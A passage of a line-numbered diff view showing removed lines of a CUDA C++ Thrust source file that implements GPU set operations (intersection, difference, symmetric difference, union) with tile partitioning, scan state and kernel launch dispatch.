.ExclusiveSum(thread_output_count,
|
662 |
-
thread_output_prefix,
|
663 |
-
tile_output_count);
|
664 |
-
if (threadIdx.x == 0)
|
665 |
-
{
|
666 |
-
// Update tile status if this is not the last tile
|
667 |
-
if (!IS_LAST_TILE)
|
668 |
-
{
|
669 |
-
tile_state.SetInclusive(0, tile_output_count);
|
670 |
-
}
|
671 |
-
}
|
672 |
-
}
|
673 |
-
else
|
674 |
-
{
|
675 |
-
TilePrefixCallback prefix_cb(tile_state,
|
676 |
-
storage.prefix,
|
677 |
-
cub::Sum(),
|
678 |
-
tile_idx);
|
679 |
-
|
680 |
-
BlockScan(storage.scan)
|
681 |
-
.ExclusiveSum(thread_output_count,
|
682 |
-
thread_output_prefix,
|
683 |
-
prefix_cb);
|
684 |
-
tile_output_count = prefix_cb.GetBlockAggregate();
|
685 |
-
tile_output_prefix = prefix_cb.GetExclusivePrefix();
|
686 |
-
}
|
687 |
-
|
688 |
-
sync_threadblock();
|
689 |
-
|
690 |
-
// scatter results
|
691 |
-
//
|
692 |
-
scatter(keys_out,
|
693 |
-
keys_loc,
|
694 |
-
&storage.keys_shared[0],
|
695 |
-
active_mask,
|
696 |
-
thread_output_prefix,
|
697 |
-
tile_output_prefix,
|
698 |
-
tile_output_count);
|
699 |
-
|
700 |
-
if (HAS_VALUES::value)
|
701 |
-
{
|
702 |
-
value_type values_loc[ITEMS_PER_THREAD];
|
703 |
-
gmem_to_reg<!IS_LAST_TILE>(values_loc,
|
704 |
-
values1_in + keys1_beg,
|
705 |
-
values2_in + keys2_beg,
|
706 |
-
num_keys1,
|
707 |
-
num_keys2);
|
708 |
-
|
709 |
-
sync_threadblock();
|
710 |
-
|
711 |
-
reg_to_shared(&storage.values_shared[0], values_loc);
|
712 |
-
|
713 |
-
sync_threadblock();
|
714 |
-
|
715 |
-
// gather items from shared mem
|
716 |
-
//
|
717 |
-
#pragma unroll
|
718 |
-
for (int ITEM = 0; ITEM < ITEMS_PER_THREAD; ++ITEM)
|
719 |
-
{
|
720 |
-
if (active_mask & (1 << ITEM))
|
721 |
-
{
|
722 |
-
values_loc[ITEM] = storage.values_shared[indices[ITEM]];
|
723 |
-
}
|
724 |
-
}
|
725 |
-
|
726 |
-
sync_threadblock();
|
727 |
-
|
728 |
-
scatter(values_out,
|
729 |
-
values_loc,
|
730 |
-
&storage.values_shared[0],
|
731 |
-
active_mask,
|
732 |
-
thread_output_prefix,
|
733 |
-
tile_output_prefix,
|
734 |
-
tile_output_count);
|
735 |
-
}
|
736 |
-
|
737 |
-
if (IS_LAST_TILE && threadIdx.x == 0)
|
738 |
-
{
|
739 |
-
*output_count = tile_output_prefix + tile_output_count;
|
740 |
-
}
|
741 |
-
}
|
742 |
-
|
743 |
-
//---------------------------------------------------------------------
|
744 |
-
// Constructor
|
745 |
-
//---------------------------------------------------------------------
|
746 |
-
|
747 |
-
THRUST_DEVICE_FUNCTION
|
748 |
-
impl(TempStorage & storage_,
|
749 |
-
ScanTileState &tile_state_,
|
750 |
-
KeysIt1 keys1_,
|
751 |
-
KeysIt2 keys2_,
|
752 |
-
ValuesIt1 values1_,
|
753 |
-
ValuesIt2 values2_,
|
754 |
-
Size keys1_count_,
|
755 |
-
Size keys2_count_,
|
756 |
-
KeysOutputIt keys_out_,
|
757 |
-
ValuesOutputIt values_out_,
|
758 |
-
CompareOp compare_op_,
|
759 |
-
SetOp set_op_,
|
760 |
-
pair<Size, Size> *partitions_,
|
761 |
-
std::size_t * output_count_)
|
762 |
-
: storage(storage_),
|
763 |
-
tile_state(tile_state_),
|
764 |
-
keys1_in(core::make_load_iterator(ptx_plan(), keys1_)),
|
765 |
-
keys2_in(core::make_load_iterator(ptx_plan(), keys2_)),
|
766 |
-
values1_in(core::make_load_iterator(ptx_plan(), values1_)),
|
767 |
-
values2_in(core::make_load_iterator(ptx_plan(), values2_)),
|
768 |
-
keys1_count(keys1_count_),
|
769 |
-
keys2_count(keys2_count_),
|
770 |
-
keys_out(keys_out_),
|
771 |
-
values_out(values_out_),
|
772 |
-
compare_op(compare_op_),
|
773 |
-
set_op(set_op_),
|
774 |
-
partitions(partitions_),
|
775 |
-
output_count(output_count_)
|
776 |
-
{
|
777 |
-
int tile_idx = blockIdx.x;
|
778 |
-
int num_tiles = gridDim.x;
|
779 |
-
|
780 |
-
if (tile_idx < num_tiles-1)
|
781 |
-
{
|
782 |
-
consume_tile<false>(tile_idx);
|
783 |
-
}
|
784 |
-
else
|
785 |
-
{
|
786 |
-
consume_tile<true>(tile_idx);
|
787 |
-
}
|
788 |
-
}
|
789 |
-
}; // struct impl
|
790 |
-
|
791 |
-
//---------------------------------------------------------------------
|
792 |
-
// Agent entry point
|
793 |
-
//---------------------------------------------------------------------
|
794 |
-
|
795 |
-
THRUST_AGENT_ENTRY(KeysIt1 keys1,
|
796 |
-
KeysIt2 keys2,
|
797 |
-
ValuesIt1 values1,
|
798 |
-
ValuesIt2 values2,
|
799 |
-
Size keys1_count,
|
800 |
-
Size keys2_count,
|
801 |
-
KeysOutputIt keys_output,
|
802 |
-
ValuesOutputIt values_output,
|
803 |
-
CompareOp compare_op,
|
804 |
-
SetOp set_op,
|
805 |
-
pair<Size, Size> *partitions,
|
806 |
-
std::size_t * output_count,
|
807 |
-
ScanTileState tile_state,
|
808 |
-
char * shmem)
|
809 |
-
{
|
810 |
-
TempStorage &storage = *reinterpret_cast<TempStorage *>(shmem);
|
811 |
-
|
812 |
-
impl(storage,
|
813 |
-
tile_state,
|
814 |
-
keys1,
|
815 |
-
keys2,
|
816 |
-
values1,
|
817 |
-
values2,
|
818 |
-
keys1_count,
|
819 |
-
keys2_count,
|
820 |
-
keys_output,
|
821 |
-
values_output,
|
822 |
-
compare_op,
|
823 |
-
set_op,
|
824 |
-
partitions,
|
825 |
-
output_count);
|
826 |
-
}
|
827 |
-
}; // struct SetOpAgent
|
828 |
-
|
829 |
-
template <class KeysIt1,
|
830 |
-
class KeysIt2,
|
831 |
-
class Size,
|
832 |
-
class CompareOp>
|
833 |
-
struct PartitionAgent
|
834 |
-
{
|
835 |
-
template <class Arch>
|
836 |
-
struct PtxPlan : PtxPolicy<256> {};
|
837 |
-
|
838 |
-
typedef core::specialize_plan<PtxPlan> ptx_plan;
|
839 |
-
|
840 |
-
//---------------------------------------------------------------------
|
841 |
-
// Agent entry point
|
842 |
-
//---------------------------------------------------------------------
|
843 |
-
|
844 |
-
THRUST_AGENT_ENTRY(KeysIt1 keys1,
|
845 |
-
KeysIt2 keys2,
|
846 |
-
Size keys1_count,
|
847 |
-
Size keys2_count,
|
848 |
-
Size num_partitions,
|
849 |
-
pair<Size, Size> *partitions,
|
850 |
-
CompareOp compare_op,
|
851 |
-
int items_per_tile,
|
852 |
-
char * /*shmem*/)
|
853 |
-
{
|
854 |
-
Size partition_idx = blockDim.x * blockIdx.x + threadIdx.x;
|
855 |
-
if (partition_idx < num_partitions)
|
856 |
-
{
|
857 |
-
Size partition_at = min<Size>(partition_idx * items_per_tile,
|
858 |
-
keys1_count + keys2_count);
|
859 |
-
pair<Size, Size> diag = balanced_path(keys1,
|
860 |
-
keys2,
|
861 |
-
keys1_count,
|
862 |
-
keys2_count,
|
863 |
-
partition_at,
|
864 |
-
4ll,
|
865 |
-
compare_op);
|
866 |
-
partitions[partition_idx] = diag;
|
867 |
-
}
|
868 |
-
}
|
869 |
-
}; // struct PartitionAgent
|
870 |
-
|
871 |
-
template <class ScanTileState,
|
872 |
-
class Size>
|
873 |
-
struct InitAgent
|
874 |
-
{
|
875 |
-
template <class Arch>
|
876 |
-
struct PtxPlan : PtxPolicy<128> {};
|
877 |
-
|
878 |
-
typedef core::specialize_plan<PtxPlan> ptx_plan;
|
879 |
-
|
880 |
-
//---------------------------------------------------------------------
|
881 |
-
// Agent entry point
|
882 |
-
//---------------------------------------------------------------------
|
883 |
-
|
884 |
-
THRUST_AGENT_ENTRY(ScanTileState tile_state,
|
885 |
-
Size num_tiles,
|
886 |
-
char * /*shmem*/)
|
887 |
-
{
|
888 |
-
tile_state.InitializeStatus(num_tiles);
|
889 |
-
}
|
890 |
-
}; // struct InitAgent
|
891 |
-
|
892 |
-
//---------------------------------------------------------------------
|
893 |
-
// Serial set operations
|
894 |
-
//---------------------------------------------------------------------
|
895 |
-
|
896 |
-
// serial_set_intersection
|
897 |
-
// -----------------------
|
898 |
-
// emit A if A and B are in range and equal.
|
899 |
-
struct serial_set_intersection
|
900 |
-
{
|
901 |
-
// max_input_size <= 32
|
902 |
-
template <class T, class CompareOp, int ITEMS_PER_THREAD>
|
903 |
-
int THRUST_DEVICE_FUNCTION
|
904 |
-
operator()(T * keys,
|
905 |
-
int keys1_beg,
|
906 |
-
int keys2_beg,
|
907 |
-
int keys1_count,
|
908 |
-
int keys2_count,
|
909 |
-
T (&output)[ITEMS_PER_THREAD],
|
910 |
-
int (&indices)[ITEMS_PER_THREAD],
|
911 |
-
CompareOp compare_op)
|
912 |
-
{
|
913 |
-
int active_mask = 0;
|
914 |
-
|
915 |
-
int aBegin = keys1_beg;
|
916 |
-
int bBegin = keys2_beg;
|
917 |
-
int aEnd = keys1_beg + keys1_count;
|
918 |
-
int bEnd = keys2_beg + keys2_count;
|
919 |
-
|
920 |
-
T aKey = keys[aBegin];
|
921 |
-
T bKey = keys[bBegin];
|
922 |
-
|
923 |
-
#pragma unroll
|
924 |
-
for (int i = 0; i < ITEMS_PER_THREAD; ++i)
|
925 |
-
{
|
926 |
-
bool pA = compare_op(aKey, bKey);
|
927 |
-
bool pB = compare_op(bKey, aKey);
|
928 |
-
|
929 |
-
// The outputs must come from A by definition of set interection.
|
930 |
-
output[i] = aKey;
|
931 |
-
indices[i] = aBegin;
|
932 |
-
|
933 |
-
if ((aBegin < aEnd) && (bBegin < bEnd) && pA == pB)
|
934 |
-
active_mask |= 1 << i;
|
935 |
-
|
936 |
-
if (!pB) {aKey = keys[++aBegin]; }
|
937 |
-
if (!pA) {bKey = keys[++bBegin]; }
|
938 |
-
}
|
939 |
-
return active_mask;
|
940 |
-
}
|
941 |
-
}; // struct serial_set_intersection
|
942 |
-
|
943 |
-
// serial_set_symmetric_difference
|
944 |
-
// ---------------------
|
945 |
-
// emit A if A < B and emit B if B < A.
|
946 |
-
struct serial_set_symmetric_difference
|
947 |
-
{
|
948 |
-
// max_input_size <= 32
|
949 |
-
template <class T, class CompareOp, int ITEMS_PER_THREAD>
|
950 |
-
int THRUST_DEVICE_FUNCTION
|
951 |
-
operator()(T * keys,
|
952 |
-
int keys1_beg,
|
953 |
-
int keys2_beg,
|
954 |
-
int keys1_count,
|
955 |
-
int keys2_count,
|
956 |
-
T (&output)[ITEMS_PER_THREAD],
|
957 |
-
int (&indices)[ITEMS_PER_THREAD],
|
958 |
-
CompareOp compare_op)
|
959 |
-
{
|
960 |
-
int active_mask = 0;
|
961 |
-
|
962 |
-
int aBegin = keys1_beg;
|
963 |
-
int bBegin = keys2_beg;
|
964 |
-
int aEnd = keys1_beg + keys1_count;
|
965 |
-
int bEnd = keys2_beg + keys2_count;
|
966 |
-
int end = aEnd + bEnd;
|
967 |
-
|
968 |
-
T aKey = keys[aBegin];
|
969 |
-
T bKey = keys[bBegin];
|
970 |
-
|
971 |
-
|
972 |
-
#pragma unroll
|
973 |
-
for (int i = 0; i < ITEMS_PER_THREAD; ++i)
|
974 |
-
{
|
975 |
-
bool pB = aBegin >= aEnd;
|
976 |
-
bool pA = !pB && bBegin >= bEnd;
|
977 |
-
|
978 |
-
if (!pA && !pB)
|
979 |
-
{
|
980 |
-
pA = compare_op(aKey, bKey);
|
981 |
-
pB = !pA && compare_op(bKey, aKey);
|
982 |
-
}
|
983 |
-
|
984 |
-
// The outputs must come from A by definition of set difference.
|
985 |
-
output[i] = pA ? aKey : bKey;
|
986 |
-
indices[i] = pA ? aBegin : bBegin;
|
987 |
-
|
988 |
-
if (aBegin + bBegin < end && pA != pB)
|
989 |
-
active_mask |= 1 << i;
|
990 |
-
|
991 |
-
if (!pB) {aKey = keys[++aBegin]; }
|
992 |
-
if (!pA) {bKey = keys[++bBegin]; }
|
993 |
-
|
994 |
-
}
|
995 |
-
return active_mask;
|
996 |
-
}
|
997 |
-
}; // struct set_symmetric_difference
|
998 |
-
|
999 |
-
// serial_set_difference
|
1000 |
-
// ---------------------
|
1001 |
-
// emit A if A < B
|
1002 |
-
struct serial_set_difference
|
1003 |
-
{
|
1004 |
-
// max_input_size <= 32
|
1005 |
-
template <class T, class CompareOp, int ITEMS_PER_THREAD>
|
1006 |
-
int THRUST_DEVICE_FUNCTION
|
1007 |
-
operator()(T * keys,
|
1008 |
-
int keys1_beg,
|
1009 |
-
int keys2_beg,
|
1010 |
-
int keys1_count,
|
1011 |
-
int keys2_count,
|
1012 |
-
T (&output)[ITEMS_PER_THREAD],
|
1013 |
-
int (&indices)[ITEMS_PER_THREAD],
|
1014 |
-
CompareOp compare_op)
|
1015 |
-
{
|
1016 |
-
int active_mask = 0;
|
1017 |
-
|
1018 |
-
int aBegin = keys1_beg;
|
1019 |
-
int bBegin = keys2_beg;
|
1020 |
-
int aEnd = keys1_beg + keys1_count;
|
1021 |
-
int bEnd = keys2_beg + keys2_count;
|
1022 |
-
int end = aEnd + bEnd;
|
1023 |
-
|
1024 |
-
T aKey = keys[aBegin];
|
1025 |
-
T bKey = keys[bBegin];
|
1026 |
-
|
1027 |
-
#pragma unroll
|
1028 |
-
for (int i = 0; i < ITEMS_PER_THREAD; ++i)
|
1029 |
-
{
|
1030 |
-
bool pB = aBegin >= aEnd;
|
1031 |
-
bool pA = !pB && bBegin >= bEnd;
|
1032 |
-
|
1033 |
-
if (!pA && !pB)
|
1034 |
-
{
|
1035 |
-
pA = compare_op(aKey, bKey);
|
1036 |
-
pB = !pA && compare_op(bKey, aKey);
|
1037 |
-
}
|
1038 |
-
|
1039 |
-
// The outputs must come from A by definition of set difference.
|
1040 |
-
output[i] = aKey;
|
1041 |
-
indices[i] = aBegin;
|
1042 |
-
|
1043 |
-
if (aBegin + bBegin < end && pA)
|
1044 |
-
active_mask |= 1 << i;
|
1045 |
-
|
1046 |
-
if (!pB) { aKey = keys[++aBegin]; }
|
1047 |
-
if (!pA) { bKey = keys[++bBegin]; }
|
1048 |
-
}
|
1049 |
-
return active_mask;
|
1050 |
-
}
|
1051 |
-
}; // struct set_difference
|
1052 |
-
|
1053 |
-
// serial_set_union
|
1054 |
-
// ----------------
|
1055 |
-
// emit A if A <= B else emit B
|
1056 |
-
struct serial_set_union
|
1057 |
-
{
|
1058 |
-
// max_input_size <= 32
|
1059 |
-
template <class T, class CompareOp, int ITEMS_PER_THREAD>
|
1060 |
-
int THRUST_DEVICE_FUNCTION
|
1061 |
-
operator()(T * keys,
|
1062 |
-
int keys1_beg,
|
1063 |
-
int keys2_beg,
|
1064 |
-
int keys1_count,
|
1065 |
-
int keys2_count,
|
1066 |
-
T (&output)[ITEMS_PER_THREAD],
|
1067 |
-
int (&indices)[ITEMS_PER_THREAD],
|
1068 |
-
CompareOp compare_op)
|
1069 |
-
{
|
1070 |
-
int active_mask = 0;
|
1071 |
-
|
1072 |
-
int aBegin = keys1_beg;
|
1073 |
-
int bBegin = keys2_beg;
|
1074 |
-
int aEnd = keys1_beg + keys1_count;
|
1075 |
-
int bEnd = keys2_beg + keys2_count;
|
1076 |
-
int end = aEnd + bEnd;
|
1077 |
-
|
1078 |
-
T aKey = keys[aBegin];
|
1079 |
-
T bKey = keys[bBegin];
|
1080 |
-
|
1081 |
-
#pragma unroll
|
1082 |
-
for (int i = 0; i < ITEMS_PER_THREAD; ++i)
|
1083 |
-
{
|
1084 |
-
bool pB = aBegin >= aEnd;
|
1085 |
-
bool pA = !pB && bBegin >= bEnd;
|
1086 |
-
|
1087 |
-
if (!pA && !pB)
|
1088 |
-
{
|
1089 |
-
pA = compare_op(aKey, bKey);
|
1090 |
-
pB = !pA && compare_op(bKey, aKey);
|
1091 |
-
}
|
1092 |
-
|
1093 |
-
// Output A in case of a tie, so check if b < a.
|
1094 |
-
output[i] = pB ? bKey : aKey;
|
1095 |
-
indices[i] = pB ? bBegin : aBegin;
|
1096 |
-
|
1097 |
-
if (aBegin + bBegin < end)
|
1098 |
-
active_mask |= 1 << i;
|
1099 |
-
|
1100 |
-
if (!pB) { aKey = keys[++aBegin]; }
|
1101 |
-
if (!pA) { bKey = keys[++bBegin]; }
|
1102 |
-
|
1103 |
-
}
|
1104 |
-
return active_mask;
|
1105 |
-
}
|
1106 |
-
}; // struct set_union
|
1107 |
-
|
1108 |
-
template <class HAS_VALUES,
|
1109 |
-
class KeysIt1,
|
1110 |
-
class KeysIt2,
|
1111 |
-
class ValuesIt1,
|
1112 |
-
class ValuesIt2,
|
1113 |
-
class Size,
|
1114 |
-
class KeysOutputIt,
|
1115 |
-
class ValuesOutputIt,
|
1116 |
-
class CompareOp,
|
1117 |
-
class SetOp>
|
1118 |
-
cudaError_t THRUST_RUNTIME_FUNCTION
|
1119 |
-
doit_step(void * d_temp_storage,
|
1120 |
-
size_t & temp_storage_size,
|
1121 |
-
KeysIt1 keys1,
|
1122 |
-
KeysIt2 keys2,
|
1123 |
-
ValuesIt1 values1,
|
1124 |
-
ValuesIt2 values2,
|
1125 |
-
Size num_keys1,
|
1126 |
-
Size num_keys2,
|
1127 |
-
KeysOutputIt keys_output,
|
1128 |
-
ValuesOutputIt values_output,
|
1129 |
-
std::size_t * output_count,
|
1130 |
-
CompareOp compare_op,
|
1131 |
-
SetOp set_op,
|
1132 |
-
cudaStream_t stream,
|
1133 |
-
bool debug_sync)
|
1134 |
-
{
|
1135 |
-
Size keys_total = num_keys1 + num_keys2;
|
1136 |
-
if (keys_total == 0)
|
1137 |
-
return cudaErrorNotSupported;
|
1138 |
-
|
1139 |
-
cudaError_t status = cudaSuccess;
|
1140 |
-
|
1141 |
-
using core::AgentPlan;
|
1142 |
-
using core::AgentLauncher;
|
1143 |
-
|
1144 |
-
typedef AgentLauncher<
|
1145 |
-
SetOpAgent<KeysIt1,
|
1146 |
-
KeysIt2,
|
1147 |
-
ValuesIt1,
|
1148 |
-
ValuesIt2,
|
1149 |
-
KeysOutputIt,
|
1150 |
-
ValuesOutputIt,
|
1151 |
-
Size,
|
1152 |
-
CompareOp,
|
1153 |
-
SetOp,
|
1154 |
-
HAS_VALUES> >
|
1155 |
-
set_op_agent;
|
1156 |
-
|
1157 |
-
typedef AgentLauncher<PartitionAgent<KeysIt1, KeysIt2, Size, CompareOp> >
|
1158 |
-
partition_agent;
|
1159 |
-
|
1160 |
-
typedef typename set_op_agent::ScanTileState ScanTileState;
|
1161 |
-
typedef AgentLauncher<InitAgent<ScanTileState, Size> > init_agent;
|
1162 |
-
|
1163 |
-
|
1164 |
-
AgentPlan set_op_plan = set_op_agent::get_plan(stream);
|
1165 |
-
AgentPlan init_plan = init_agent::get_plan();
|
1166 |
-
AgentPlan partition_plan = partition_agent::get_plan();
|
1167 |
-
|
1168 |
-
int tile_size = set_op_plan.items_per_tile;
|
1169 |
-
Size num_tiles = (keys_total + tile_size - 1) / tile_size;
|
1170 |
-
|
1171 |
-
size_t tile_agent_storage;
|
1172 |
-
status = ScanTileState::AllocationSize(num_tiles, tile_agent_storage);
|
1173 |
-
CUDA_CUB_RET_IF_FAIL(status);
|
1174 |
-
|
1175 |
-
size_t vshmem_storage = core::vshmem_size(set_op_plan.shared_memory_size,
|
1176 |
-
num_tiles);
|
1177 |
-
size_t partition_agent_storage = (num_tiles + 1) * sizeof(Size) * 2;
|
1178 |
-
|
1179 |
-
void *allocations[3] = {NULL, NULL, NULL};
|
1180 |
-
size_t allocation_sizes[3] = {tile_agent_storage,
|
1181 |
-
partition_agent_storage,
|
1182 |
-
vshmem_storage};
|
1183 |
-
|
1184 |
-
status = core::alias_storage(d_temp_storage,
|
1185 |
-
temp_storage_size,
|
1186 |
-
allocations,
|
1187 |
-
allocation_sizes);
|
1188 |
-
CUDA_CUB_RET_IF_FAIL(status);
|
1189 |
-
|
1190 |
-
if (d_temp_storage == NULL)
|
1191 |
-
{
|
1192 |
-
return status;
|
1193 |
-
}
|
1194 |
-
|
1195 |
-
ScanTileState tile_state;
|
1196 |
-
status = tile_state.Init(num_tiles, allocations[0], allocation_sizes[0]);
|
1197 |
-
CUDA_CUB_RET_IF_FAIL(status);
|
1198 |
-
|
1199 |
-
pair<Size, Size> *partitions = (pair<Size, Size> *)allocations[1];
|
1200 |
-
char *vshmem_ptr = vshmem_storage > 0 ? (char *)allocations[2] : NULL;
|
1201 |
-
|
1202 |
-
init_agent ia(init_plan, num_tiles, stream, "set_op::init_agent", debug_sync);
|
1203 |
-
ia.launch(tile_state, num_tiles);
|
1204 |
-
CUDA_CUB_RET_IF_FAIL(cudaPeekAtLastError());
|
1205 |
-
|
1206 |
-
partition_agent pa(partition_plan, num_tiles+1, stream, "set_op::partition agent", debug_sync);
|
1207 |
-
pa.launch(keys1,
|
1208 |
-
keys2,
|
1209 |
-
num_keys1,
|
1210 |
-
num_keys2,
|
1211 |
-
num_tiles+1,
|
1212 |
-
partitions,
|
1213 |
-
compare_op,
|
1214 |
-
tile_size);
|
1215 |
-
CUDA_CUB_RET_IF_FAIL(cudaPeekAtLastError());
|
1216 |
-
|
1217 |
-
set_op_agent sa(set_op_plan, keys_total, stream, vshmem_ptr, "set_op::set_op_agent", debug_sync);
|
1218 |
-
sa.launch(keys1,
|
1219 |
-
keys2,
|
1220 |
-
values1,
|
1221 |
-
values2,
|
1222 |
-
num_keys1,
|
1223 |
-
num_keys2,
|
1224 |
-
keys_output,
|
1225 |
-
values_output,
|
1226 |
-
compare_op,
|
1227 |
-
set_op,
|
1228 |
-
partitions,
|
1229 |
-
output_count,
|
1230 |
-
tile_state);
|
1231 |
-
CUDA_CUB_RET_IF_FAIL(cudaPeekAtLastError());
|
1232 |
-
|
1233 |
-
return status;
|
1234 |
-
}
|
1235 |
-
|
1236 |
-
template <typename HAS_VALUES,
|
1237 |
-
typename Derived,
|
1238 |
-
typename KeysIt1,
|
1239 |
-
typename KeysIt2,
|
1240 |
-
typename ValuesIt1,
|
1241 |
-
typename ValuesIt2,
|
1242 |
-
typename KeysOutputIt,
|
1243 |
-
typename ValuesOutputIt,
|
1244 |
-
typename CompareOp,
|
1245 |
-
typename SetOp>
|
1246 |
-
THRUST_RUNTIME_FUNCTION
|
1247 |
-
pair<KeysOutputIt, ValuesOutputIt>
|
1248 |
-
set_operations(execution_policy<Derived>& policy,
|
1249 |
-
KeysIt1 keys1_first,
|
1250 |
-
KeysIt1 keys1_last,
|
1251 |
-
KeysIt2 keys2_first,
|
1252 |
-
KeysIt2 keys2_last,
|
1253 |
-
ValuesIt1 values1_first,
|
1254 |
-
ValuesIt2 values2_first,
|
1255 |
-
KeysOutputIt keys_output,
|
1256 |
-
ValuesOutputIt values_output,
|
1257 |
-
CompareOp compare_op,
|
1258 |
-
SetOp set_op)
|
1259 |
-
{
|
1260 |
-
typedef typename iterator_traits<KeysIt1>::difference_type size_type;
|
1261 |
-
|
1262 |
-
size_type num_keys1 = static_cast<size_type>(thrust::distance(keys1_first, keys1_last));
|
1263 |
-
size_type num_keys2 = static_cast<size_type>(thrust::distance(keys2_first, keys2_last));
|
1264 |
-
|
1265 |
-
if (num_keys1 + num_keys2 == 0)
|
1266 |
-
return thrust::make_pair(keys_output, values_output);
|
1267 |
-
|
1268 |
-
size_t temp_storage_bytes = 0;
|
1269 |
-
cudaStream_t stream = cuda_cub::stream(policy);
|
1270 |
-
bool debug_sync = THRUST_DEBUG_SYNC_FLAG;
|
1271 |
-
|
1272 |
-
cudaError_t status;
|
1273 |
-
THRUST_DOUBLE_INDEX_TYPE_DISPATCH(status, doit_step<HAS_VALUES>,
|
1274 |
-
num_keys1, num_keys2, (NULL,
|
1275 |
-
temp_storage_bytes,
|
1276 |
-
keys1_first,
|
1277 |
-
keys2_first,
|
1278 |
-
values1_first,
|
1279 |
-
values2_first,
|
1280 |
-
num_keys1_fixed,
|
1281 |
-
num_keys2_fixed,
|
1282 |
-
keys_output,
|
1283 |
-
values_output,
|
1284 |
-
reinterpret_cast<std::size_t*>(NULL),
|
1285 |
-
compare_op,
|
1286 |
-
set_op,
|
1287 |
-
stream,
|
1288 |
-
debug_sync));
|
1289 |
-
cuda_cub::throw_on_error(status, "set_operations failed on 1st step");
|
1290 |
-
|
1291 |
-
size_t allocation_sizes[2] = {sizeof(std::size_t), temp_storage_bytes};
|
1292 |
-
void * allocations[2] = {NULL, NULL};
|
1293 |
-
|
1294 |
-
size_t storage_size = 0;
|
1295 |
-
|
1296 |
-
status = core::alias_storage(NULL,
|
1297 |
-
storage_size,
|
1298 |
-
allocations,
|
1299 |
-
allocation_sizes);
|
1300 |
-
cuda_cub::throw_on_error(status, "set_operations failed on 1st alias_storage");
|
1301 |
-
|
1302 |
-
// Allocate temporary storage.
|
1303 |
-
thrust::detail::temporary_array<thrust::detail::uint8_t, Derived>
|
1304 |
-
tmp(policy, storage_size);
|
1305 |
-
void *ptr = static_cast<void*>(tmp.data().get());
|
1306 |
-
|
1307 |
-
status = core::alias_storage(ptr,
|
1308 |
-
storage_size,
|
1309 |
-
allocations,
|
1310 |
-
allocation_sizes);
|
1311 |
-
cuda_cub::throw_on_error(status, "set_operations failed on 2nd alias_storage");
|
1312 |
-
|
1313 |
-
std::size_t* d_output_count
|
1314 |
-
= thrust::detail::aligned_reinterpret_cast<std::size_t*>(allocations[0]);
|
1315 |
-
|
1316 |
-
THRUST_DOUBLE_INDEX_TYPE_DISPATCH(status, doit_step<HAS_VALUES>,
|
1317 |
-
num_keys1, num_keys2, (allocations[1],
|
1318 |
-
temp_storage_bytes,
|
1319 |
-
keys1_first,
|
1320 |
-
keys2_first,
|
1321 |
-
values1_first,
|
1322 |
-
values2_first,
|
1323 |
-
num_keys1_fixed,
|
1324 |
-
num_keys2_fixed,
|
1325 |
-
keys_output,
|
1326 |
-
values_output,
|
1327 |
-
d_output_count,
|
1328 |
-
compare_op,
|
1329 |
-
set_op,
|
1330 |
-
stream,
|
1331 |
-
debug_sync));
|
1332 |
-
cuda_cub::throw_on_error(status, "set_operations failed on 2nd step");
|
1333 |
-
|
1334 |
-
status = cuda_cub::synchronize(policy);
|
1335 |
-
cuda_cub::throw_on_error(status, "set_operations failed to synchronize");
|
1336 |
-
|
1337 |
-
std::size_t output_count = cuda_cub::get_value(policy, d_output_count);
|
1338 |
-
|
1339 |
-
return thrust::make_pair(keys_output + output_count, values_output + output_count);
|
1340 |
-
}
|
1341 |
-
} // namespace __set_operations
|
1342 |
-
|
1343 |
-
//-------------------------
|
1344 |
-
// Thrust API entry points
|
1345 |
-
//-------------------------
|
1346 |
-
|
1347 |
-
__thrust_exec_check_disable__
|
1348 |
-
template <class Derived,
|
1349 |
-
class ItemsIt1,
|
1350 |
-
class ItemsIt2,
|
1351 |
-
class OutputIt,
|
1352 |
-
class CompareOp>
|
1353 |
-
OutputIt __host__ __device__
|
1354 |
-
set_difference(execution_policy<Derived> &policy,
|
1355 |
-
ItemsIt1 items1_first,
|
1356 |
-
ItemsIt1 items1_last,
|
1357 |
-
ItemsIt2 items2_first,
|
1358 |
-
ItemsIt2 items2_last,
|
1359 |
-
OutputIt result,
|
1360 |
-
CompareOp compare)
|
1361 |
-
{
|
1362 |
-
OutputIt ret = result;
|
1363 |
-
if (__THRUST_HAS_CUDART__)
|
1364 |
-
{
|
1365 |
-
typename thrust::iterator_value<ItemsIt1>::type *null_ = NULL;
|
1366 |
-
//
|
1367 |
-
ret = __set_operations::set_operations<thrust::detail::false_type>(
|
1368 |
-
policy,
|
1369 |
-
items1_first,
|
1370 |
-
items1_last,
|
1371 |
-
items2_first,
|
1372 |
-
items2_last,
|
1373 |
-
null_,
|
1374 |
-
null_,
|
1375 |
-
result,
|
1376 |
-
null_,
|
1377 |
-
compare,
|
1378 |
-
__set_operations::serial_set_difference())
|
1379 |
-
.first;
|
1380 |
-
}
|
1381 |
-
else
|
1382 |
-
{
|
1383 |
-
#if !__THRUST_HAS_CUDART__
|
1384 |
-
ret = thrust::set_difference(cvt_to_seq(derived_cast(policy)),
|
1385 |
-
items1_first,
|
1386 |
-
items1_last,
|
1387 |
-
items2_first,
|
1388 |
-
items2_last,
|
1389 |
-
result,
|
1390 |
-
compare);
|
1391 |
-
#endif
|
1392 |
-
}
|
1393 |
-
return ret;
|
1394 |
-
}
|
1395 |
-
|
1396 |
-
template <class Derived,
|
1397 |
-
class ItemsIt1,
|
1398 |
-
class ItemsIt2,
|
1399 |
-
class OutputIt>
|
1400 |
-
OutputIt __host__ __device__
|
1401 |
-
set_difference(execution_policy<Derived> &policy,
|
1402 |
-
ItemsIt1 items1_first,
|
1403 |
-
ItemsIt1 items1_last,
|
1404 |
-
ItemsIt2 items2_first,
|
1405 |
-
ItemsIt2 items2_last,
|
1406 |
-
OutputIt result)
|
1407 |
-
{
|
1408 |
-
typedef typename thrust::iterator_value<ItemsIt1>::type value_type;
|
1409 |
-
return cuda_cub::set_difference(policy,
|
1410 |
-
items1_first,
|
1411 |
-
items1_last,
|
1412 |
-
items2_first,
|
1413 |
-
items2_last,
|
1414 |
-
result,
|
1415 |
-
less<value_type>());
|
1416 |
-
}
|
1417 |
-
|
1418 |
-
/*****************************/
|
1419 |
-
|
1420 |
-
|
1421 |
-
__thrust_exec_check_disable__
|
1422 |
-
template <class Derived,
|
1423 |
-
class ItemsIt1,
|
1424 |
-
class ItemsIt2,
|
1425 |
-
class OutputIt,
|
1426 |
-
class CompareOp>
|
1427 |
-
OutputIt __host__ __device__
|
1428 |
-
set_intersection(execution_policy<Derived> &policy,
|
1429 |
-
ItemsIt1 items1_first,
|
1430 |
-
ItemsIt1 items1_last,
|
1431 |
-
